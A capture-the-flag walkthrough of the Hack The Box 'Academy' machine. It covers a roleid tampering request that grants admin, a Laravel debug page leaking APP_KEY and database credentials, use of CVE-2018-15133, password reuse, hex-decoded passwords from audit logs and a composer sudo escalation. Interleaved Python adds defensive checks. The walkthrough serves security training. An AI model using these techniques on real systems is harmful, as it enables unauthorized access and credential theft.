[image: academy11]

This is the step-by-step walkthrough of the Academy machine on Hack The Box. According to the machine difficulty rating, it is categorized as medium difficulty by most fellow haxors.

[image: academy12]

Will get the machine started and note the IP address.

[image: academy]

Initial reconnaissance results:

[*] Nmap: 22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
[*] Nmap: 80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
[*] Nmap: 33060/tcp open mysqlx?
[*] Nmap: 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
[*] Nmap: SF-Port33060-TCP:V=7.91%I=7%D=12/10%Time=5FD1EA61%P=x86_64-pc-linux-gnu%r(
[*] Nmap: SF:NULL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GenericLines,9,"\x05\0\0\0\x0b
[*] Nmap: SF:\x08\x05\x1a\0")%r(GetRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(HTTPO
[*] Nmap: SF:ptions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RTSPRequest,9,"\x05\0\0\0\x0
[*] Nmap: SF:b\x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSVer
[*] Nmap: SF:sionBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSStatusRequestTCP,
[*] Nmap: SF:2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0f
[*] Nmap: SF:Invalid\x20message\"\x05HY000")%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a\0"
[*] Nmap: SF:)%r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x0
[*] Nmap: SF:1\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(TerminalServerCooki
[*] Nmap: SF:e,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TLSSessionReq,2B,"\x05\0\0\0\x0b\
[*] Nmap: SF:x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\
[*] Nmap: SF:"\x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNeg,
[*] Nmap: SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x05
[*] Nmap: SF:\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY
[*] Nmap: SF:000")%r(FourOhFourRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LPDString
[*] Nmap: SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LDAPSearchReq,2B,"\x05\0\0\0\x0b\x
[*] Nmap: SF:08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"
[*] Nmap: SF:\x05HY000")%r(LDAPBindReq,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SIPOption
[*] Nmap: SF:s,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LANDesk-RC,9,"\x05\0\0\0\x0b\x08\
[*] Nmap: SF:x05\x1a\0")%r(TerminalServer,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NCP,9,
[*] Nmap: SF:"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NotesRPC,2B,"\x05\0\0\0\x0b\x08\x05\x
[*] Nmap: SF:1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY00
[*] Nmap: SF:0")%r(JavaRMI,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(WMSRequest,9,"\x05\0\
[*] Nmap: SF:0\0\x0b\x08\x05\x1a\0")%r(oracle-tns,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%
[*] Nmap: SF:r(ms-sql-s,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(afp,2B,"\x05\0\0\0\x0b\x
[*] Nmap: SF:08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"
[*] Nmap: SF:\x05HY000")%r(giop,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");

Ports 22 and 80 are running their usual services. There is an unusual port, 33060, for which nmap couldn't do service detection. Will start with port 80 and check what's on the UI.
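Nmap could not name the service on 33060, but the fingerprint bytes it printed are enough to identify it: a 4-byte little-endian length, a 1-byte message type and a protobuf payload is the framing of the MySQL X Protocol (the mysqlx plugin, whose default port is 33060). The Python below is an added example, not part of the writeup; it decodes the two responses copied out of the fingerprint above. The message-type names and field numbers are taken from the Mysqlx .proto definitions as I recall them, so treat those mappings as assumptions.

```python
import struct

# Mysqlx.ServerMessages.Type values (assumed from the MySQL X Protocol .proto files)
SERVER_MESSAGE_TYPES = {0: "OK", 1: "ERROR", 2: "CONN_CAPABILITIES",
                        3: "SESS_AUTHENTICATE_CONTINUE", 4: "SESS_AUTHENTICATE_OK",
                        11: "NOTICE"}
# Mysqlx.Error fields: severity=1, code=2, msg=3, sql_state=4
# Mysqlx.Notice.Frame fields: type=1, scope=2, payload=3 (type 5 = ServerHello)


def read_varint(buf, pos):
    """Decode a protobuf base-128 varint starting at buf[pos]; return (value, new_pos)."""
    result, shift = 0, 0
    while True:
        b = buf[pos]
        pos += 1
        result |= (b & 0x7F) << shift
        if not b & 0x80:
            return result, pos
        shift += 7


def decode_fields(payload):
    """Minimal protobuf wire decoder: {field_number: value} for varint and
    length-delimited fields, which is all the Error and Notice messages use."""
    fields, pos = {}, 0
    while pos < len(payload):
        key, pos = read_varint(payload, pos)
        field_no, wire_type = key >> 3, key & 0x7
        if wire_type == 0:                       # varint
            value, pos = read_varint(payload, pos)
        elif wire_type == 2:                     # length-delimited (bytes/string)
            length, pos = read_varint(payload, pos)
            value = payload[pos:pos + length]
            pos += length
        else:
            raise ValueError(f"unsupported wire type {wire_type}")
        fields[field_no] = value
    return fields


def parse_mysqlx_frames(data):
    """Split a byte stream into X Protocol frames: <u32 LE length><u8 type><payload>.
    The length counts the type byte plus the payload, not the length field itself."""
    frames, pos = [], 0
    while pos + 5 <= len(data):
        (length,) = struct.unpack_from("<I", data, pos)
        msg_type = data[pos + 4]
        payload = data[pos + 5:pos + 4 + length]
        frames.append({"type": SERVER_MESSAGE_TYPES.get(msg_type, msg_type),
                       "fields": decode_fields(payload)})
        pos += 4 + length
    return frames


def describe(frames):
    """Render decoded frames as one human-readable line each."""
    out = []
    for f in frames:
        fl = f["fields"]
        if f["type"] == "ERROR":
            out.append(f"ERROR code={fl[2]} sql_state={fl[4].decode()} msg={fl[3].decode()}")
        elif f["type"] == "NOTICE":
            out.append(f"NOTICE type={fl[1]}")
        else:
            out.append(str(f["type"]))
    return out


# The NULL-probe and TLSSessionReq-probe responses from the nmap fingerprint, de-escaped.
NULL_PROBE_RESPONSE = b"\x05\x00\x00\x00\x0b\x08\x05\x1a\x00"
TLSSESSIONREQ_RESPONSE = (b"\x05\x00\x00\x00\x0b\x08\x05\x1a\x00"
                          b"\x1e\x00\x00\x00\x01\x08\x01\x10\x88'\x1a\x0fInvalid message\"\x05HY000")

if __name__ == "__main__":
    for line in describe(parse_mysqlx_frames(TLSSESSIONREQ_RESPONSE)):
        print(line)
```

Every probe gets the same 9-byte server hello notice first, and anything that is not a valid X Protocol message gets back an Error frame with code 5000 "Invalid message" and SQL state HY000, which is exactly the pattern in the fingerprint. Knowing the port is the MySQL X plugin matters for the defender as much as the attacker: it is a second database listener, and it should be bound to localhost unless remote clients genuinely need it.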

[image: academy ui]

It's a PHP web application based around learning, thus the name Academy; these names are always very touché. Ran the Nikto vulnerability scanner to find out more about the website.

+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Cookie PHPSESSID created without the httponly flag
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-29786: /admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-29786: /admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-3092: /admin.php: This might be interesting...
+ /login.php: Admin login page/section found.
+ 7786 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2020-12-10 15:26:54 (GMT5.5) (442 seconds)

Nikto discovered privileged pages on the web application. To find out how the application differentiates between privileged and unprivileged users, I need a web proxy here to intercept the requests going through the app.

Upon analysing the requests, saw an interesting field called roleid in the register call for a new user. Just changed that from 0 to 1. As a result, the user that was created was an admin user, and can now access the privileged pages.

POST /register.php HTTP/1.1
Host: academy.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
Origin: http://academy.htb
Connection: close
Referer: http://academy.htb/register.php
Cookie: PHPSESSID=s6k227pb24kmst4cc0v2o5bgj8
Upgrade-Insecure-Requests: 1

uid=dmeg1&password=KYnCMT9ZiMFzncR&confirm=KYnCMT9ZiMFzncR&roleid=1
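To make the roleid problem concrete, here is an added Python sketch (mine, not the Academy app's PHP, which I have not seen) of a register handler in the vulnerable shape beside a hardened one. The safe version assigns the role server-side and rejects any field outside the expected set, which also gives you something to log and alert on when a client submits roleid at all. The request body is the one captured above; parse_form, register_vulnerable, register_hardened and the in-memory db dict are my names and not the application's.

```python
from urllib.parse import parse_qs

ROLE_USER, ROLE_ADMIN = 0, 1
# The only fields a self-service registration form should ever carry.
ALLOWED_REGISTER_FIELDS = {"uid", "password", "confirm"}


def parse_form(body):
    """Flatten an application/x-www-form-urlencoded body into {name: value}."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def register_vulnerable(form, db):
    """Mass-assignment bug: whatever roleid the client sends is stored as-is.
    (Password hashing is omitted; the point here is the role, not the hash.)"""
    if form["password"] != form["confirm"]:
        raise ValueError("passwords do not match")
    db[form["uid"]] = {"roleid": int(form.get("roleid", ROLE_USER))}
    return db[form["uid"]]


def register_hardened(form, db):
    """Role is decided by the server, never by the request. Unknown fields are
    refused rather than silently ignored, so tampering leaves a trace."""
    unexpected = set(form) - ALLOWED_REGISTER_FIELDS
    if unexpected:
        # In a real app this is the line you log with the session id and source IP.
        raise ValueError(f"unexpected form fields: {sorted(unexpected)}")
    if form["password"] != form["confirm"]:
        raise ValueError("passwords do not match")
    db[form["uid"]] = {"roleid": ROLE_USER}   # promotion happens elsewhere, by an admin
    return db[form["uid"]]


def is_tampered_registration(form):
    """Detection helper: True when a registration carries privilege fields."""
    return bool(set(form) - ALLOWED_REGISTER_FIELDS)


# The exact body from the intercepted request above.
TAMPERED_BODY = "uid=dmeg1&password=KYnCMT9ZiMFzncR&confirm=KYnCMT9ZiMFzncR&roleid=1"

if __name__ == "__main__":
    form = parse_form(TAMPERED_BODY)
    print("vulnerable handler stored:", register_vulnerable(form, {}))
    try:
        register_hardened(form, {})
    except ValueError as err:
        print("hardened handler refused:", err)
```

The general rule the hardened version applies is that authorization attributes (role, is_admin, account status) are never part of the writable input model; if the framework offers mass assignment, the allow-list has to exclude them explicitly, and the `unexpected form fields` condition is a cheap, high-signal detection for anyone probing the form.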

After logging in to /admin.php, can see this page:

[image: academy-admin]

This page says there is a dev-staging page with an outstanding issue in it. Will add this to the hosts file and try opening the page to see how it looks.

[image: dev-staging]

Due to a file permission issue, Laravel is not able to open the log file for writing and crashes. This throws a stack trace with a dump of all the environment variables used in the application. It's a treasure trove; will copy everything and see what can be used to exploit.

HTTP_HOST	
"dev-staging-01.academy.htb"
HTTP_CONNECTION
"keep-alive"
HTTP_UPGRADE_INSECURE_REQUESTS
"1"
HTTP_USER_AGENT
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36"
HTTP_ACCEPT
"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9"
HTTP_ACCEPT_ENCODING
"gzip, deflate"
HTTP_ACCEPT_LANGUAGE
"en-IN,en-US;q=0.9,en;q=0.8"
PATH
"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"
SERVER_SIGNATURE
"<address>Apache/2.4.41 (Ubuntu) Server at dev-staging-01.academy.htb Port 80</address>"
SERVER_SOFTWARE
"Apache/2.4.41 (Ubuntu)"
SERVER_NAME
"dev-staging-01.academy.htb"
SERVER_ADDR
"10.10.10.215"
SERVER_PORT
"80"
REMOTE_ADDR
"10.10.14.4"
DOCUMENT_ROOT
"/var/www/html/htb-academy-dev-01/public"
REQUEST_SCHEME
"http"
CONTEXT_PREFIX
""
CONTEXT_DOCUMENT_ROOT
"/var/www/html/htb-academy-dev-01/public"
SERVER_ADMIN
"admin@htb"
SCRIPT_FILENAME
"/var/www/html/htb-academy-dev-01/public/index.php"
REMOTE_PORT
"33984"
GATEWAY_INTERFACE
"CGI/1.1"
SERVER_PROTOCOL
"HTTP/1.1"
REQUEST_METHOD
"GET"
QUERY_STRING
""
REQUEST_URI
"/"
SCRIPT_NAME
"/index.php"
PHP_SELF
"/index.php"
REQUEST_TIME_FLOAT
1607595624.028
REQUEST_TIME
1607595624
APP_NAME
"Laravel"
APP_ENV
"local"
APP_KEY
"base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0="
APP_DEBUG
"true"
APP_URL
"http://localhost"
LOG_CHANNEL
"stack"
DB_CONNECTION
"mysql"
DB_HOST
"127.0.0.1"
DB_PORT
"3306"
DB_DATABASE
"homestead"
DB_USERNAME
"homestead"
DB_PASSWORD
"secret"
BROADCAST_DRIVER
"log"
CACHE_DRIVER
"file"
SESSION_DRIVER
"file"
SESSION_LIFETIME
"120"
QUEUE_DRIVER
"sync"
REDIS_HOST
"127.0.0.1"
REDIS_PASSWORD
"null"
REDIS_PORT
"6379"
MAIL_DRIVER
"smtp"
MAIL_HOST
"smtp.mailtrap.io"
MAIL_PORT
"2525"
MAIL_USERNAME
"null"
MAIL_PASSWORD
"null"
MAIL_ENCRYPTION
"null"
PUSHER_APP_ID
""
PUSHER_APP_KEY
""
PUSHER_APP_SECRET
""
PUSHER_APP_CLUSTER
"mt1"
MIX_PUSHER_APP_KEY
""
MIX_PUSHER_APP_CLUSTER
"mt1"
Environment Variables
APP_NAME
"Laravel"
APP_ENV
"local"
APP_KEY
"base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0="
APP_DEBUG
"true"
APP_URL
"http://localhost"
LOG_CHANNEL
"stack"
DB_CONNECTION
"mysql"
DB_HOST
"127.0.0.1"
DB_PORT
"3306"
DB_DATABASE
"homestead"
DB_USERNAME
"homestead"
DB_PASSWORD
"secret"
BROADCAST_DRIVER
"log"
CACHE_DRIVER
"file"
SESSION_DRIVER
"file"
SESSION_LIFETIME
"120"
QUEUE_DRIVER
"sync"
REDIS_HOST
"127.0.0.1"
REDIS_PASSWORD
"null"
REDIS_PORT
"6379"
MAIL_DRIVER
"smtp"
MAIL_HOST
"smtp.mailtrap.io"
MAIL_PORT
"2525"
MAIL_USERNAME
"null"
MAIL_PASSWORD
"null"
MAIL_ENCRYPTION
"null"
PUSHER_APP_ID
""
PUSHER_APP_KEY
""
PUSHER_APP_SECRET
""
PUSHER_APP_CLUSTER
"mt1"
MIX_PUSHER_APP_KEY
""
MIX_PUSHER_APP_CLUSTER
"mt1"
Registered Handlers
0. Whoops\Handler\PrettyPageHandler

Picking out the important parts of the dump.

SERVER_ADMIN
"admin@htb"
SCRIPT_FILENAME
"/var/www/html/htb-academy-dev-01/public/index.php"
REMOTE_PORT
"33984"
GATEWAY_INTERFACE
"CGI/1.1"
APP_KEY
"base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0="

Probably the CGI server itself is running on 33984. Couldn't reach it directly from the browser; it said connection refused. Could probably use it by proxying through the web server.

Since the app key is there, will use the CVE-2018-15133 exploit with Metasploit to get a shell.

In Laravel Framework through 5.5.40 and 5.6.x through 5.6.29, remote code execution might occur as a result of an unserialize call on a potentially untrusted X-XSRF-TOKEN value. This involves the decrypt method in Illuminate/Encryption/Encrypter.php and PendingBroadcast in gadgetchains/Laravel/RCE/3/chain.php in phpggc. The attacker must know the application key, which normally would never occur, but could happen if the attacker previously had privileged access or successfully accomplished a previous attack.

Which, in this case, we have.
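As an added check (not part of the writeup), the Python below reads a Laravel .env in the shape of the dump above and flags the settings that turned the debug page into a credential leak: APP_DEBUG left on, the Homestead default database credentials, and an APP_KEY that now has to be treated as compromised. The LEAKED_ENV sample is constructed from the values in the dump; HARDENED_ENV, the finding IDs and the audit function are my own, and the placeholder values in it are not real secrets.

```python
def parse_env(text):
    """Parse KEY=VALUE lines of a Laravel .env; comments and blanks are skipped,
    surrounding double quotes are stripped."""
    env = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        env[key.strip()] = value.strip().strip('"')
    return env


# Laravel Homestead ships these defaults; seeing them outside a dev VM means
# nobody changed them, and the dump above shows exactly these values.
HOMESTEAD_DEFAULTS = {"DB_DATABASE": "homestead",
                      "DB_USERNAME": "homestead",
                      "DB_PASSWORD": "secret"}


def audit_laravel_env(text):
    """Return (finding_id, explanation) pairs for settings that expose secrets."""
    env = parse_env(text)
    findings = []
    debug_on = env.get("APP_DEBUG", "false").lower() == "true"
    if debug_on:
        findings.append(("debug-enabled",
                         "APP_DEBUG=true: an unhandled exception renders a page that dumps "
                         "$_SERVER and every .env value to whoever triggered it"))
    for key, default in HOMESTEAD_DEFAULTS.items():
        if env.get(key) == default:
            findings.append(("default-credential",
                             f"{key} is still the Homestead default {default!r}"))
    if debug_on and env.get("APP_KEY"):
        findings.append(("app-key-exposed",
                         "APP_KEY is readable through the debug page; rotate it with "
                         "`php artisan key:generate`, since anyone holding it can forge "
                         "encrypted cookies and the CVE-2018-15133 payload"))
    return findings


# Constructed from the values in the dev-staging dump above.
LEAKED_ENV = """\
APP_NAME=Laravel
APP_ENV=local
APP_KEY=base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
APP_DEBUG=true
APP_URL=http://localhost
LOG_CHANNEL=stack
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=homestead
DB_USERNAME=homestead
DB_PASSWORD=secret
"""

# What the same file should look like before it is exposed to the network (placeholders only).
HARDENED_ENV = """\
APP_ENV=production
APP_KEY=base64:PLACEHOLDER_ROTATED_KEY_NOT_A_REAL_VALUE=
APP_DEBUG=false
DB_DATABASE=academy
DB_USERNAME=academy_app
DB_PASSWORD=PLACEHOLDER_UNIQUE_PASSWORD
"""

if __name__ == "__main__":
    for finding_id, explanation in audit_laravel_env(LEAKED_ENV):
        print(f"[{finding_id}] {explanation}")
    print("hardened findings:", audit_laravel_env(HARDENED_ENV))
```

The debug page is the root cause here, but note that turning APP_DEBUG off after the fact does not undo the leak: the key and the database password were already served to a remote client, so both need rotating, and the log directory permission that triggered the exception needs fixing so the app stops crashing in the first place.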

[image: user-1]

Got in as www-data; now have to do privilege escalation.

In the /var/www/html/academy folder is the Laravel directory. Its .env file has all the environment variables, and that is where the DB password is. Since the planner told us cry0l1t3 wrote the modules, he probably used the same password for his account as the DB password.

And boom, I'm in.

[image: user-2]

Now have to do privilege escalation.

Since the user doesn't have sudoers permission, it says the command will be logged.

[image: command]

It's logged in /var/log/auth/.

Checked for any command with su in the file and extracted the data.

[image: data]

Converted the hex key to a string and got the password for mrb3n.
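The hex in those records is just the TTY keystrokes that the audit subsystem captured, so the password is sitting in the log in plaintext, only hex-encoded. The Python below is an added example, not from the writeup; it decodes records in auditd's TTY format from a constructed sample log (the password, PIDs and timestamps are made up and are not the box's values) and pulls out what was typed into password-prompting programs, so a defender can see exactly what such a log leaks. The record layout is auditd's, the helper names are mine.

```python
import re

# Constructed sample in auditd TTY-record format (pam_tty_audit output).
# comm= is the program reading the keystrokes; data= is the hex of what was typed.
SAMPLE_AUDIT_LOG = """\
type=TTY msg=audit(1607700000.101:20): tty pid=2520 uid=1000 auid=1000 ses=1 major=4 minor=1 comm="bash" data=6C73202D6C610D
type=TTY msg=audit(1607700005.202:21): tty pid=2520 uid=1000 auid=1000 ses=1 major=4 minor=1 comm="bash" data=7375206D7262336E0D
type=TTY msg=audit(1607700007.303:22): tty pid=2531 uid=1000 auid=1000 ses=1 major=4 minor=1 comm="su" data=506C616365686F6C646572505733210D
type=USER_AUTH msg=audit(1607700007.404:23): pid=2531 uid=1000 auid=1000 ses=1 msg='op=PAM:authentication acct="mrb3n" exe="/usr/bin/su" hostname=? addr=? terminal=/dev/pts/0 res=success'
"""

TTY_RECORD = re.compile(r'type=TTY .*? comm="(?P<comm>[^"]*)" data=(?P<data>[0-9A-Fa-f]+)')

# Programs whose TTY input is, by design, a secret.
PASSWORD_READERS = {"su", "sudo", "passwd", "ssh", "mysql"}


def decode_tty_records(log_text):
    """Return (comm, keystrokes) for every TTY record, with data= hex decoded."""
    records = []
    for line in log_text.splitlines():
        m = TTY_RECORD.search(line)
        if m:
            keystrokes = bytes.fromhex(m.group("data")).decode("latin-1")
            records.append((m.group("comm"), keystrokes))
    return records


def find_credential_exposure(log_text):
    """Keystrokes typed into password-reading programs: each entry returned here
    is a secret that the log itself is disclosing to anyone who can read it."""
    exposed = []
    for comm, keys in decode_tty_records(log_text):
        if comm in PASSWORD_READERS:
            exposed.append((comm, keys.rstrip("\r\n")))
    return exposed


if __name__ == "__main__":
    for comm, keys in decode_tty_records(SAMPLE_AUDIT_LOG):
        print(f"{comm:6s} typed: {keys!r}")
    print("exposed:", find_credential_exposure(SAMPLE_AUDIT_LOG))
```

Two things to check on a host that shows this pattern: the audit log must not be readable by unprivileged users (the default is root-only, so a readable copy means someone relaxed the permissions), and pam_tty_audit should not be configured with the `log_passwd` option, which is what makes it record input while the terminal has echo turned off.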

[image: user-3]

From here, used the GTFOBins entry for composer to do privilege escalation, as this user had access to run composer as sudo.

Got the root flag.

[image: root]

2020-12-13
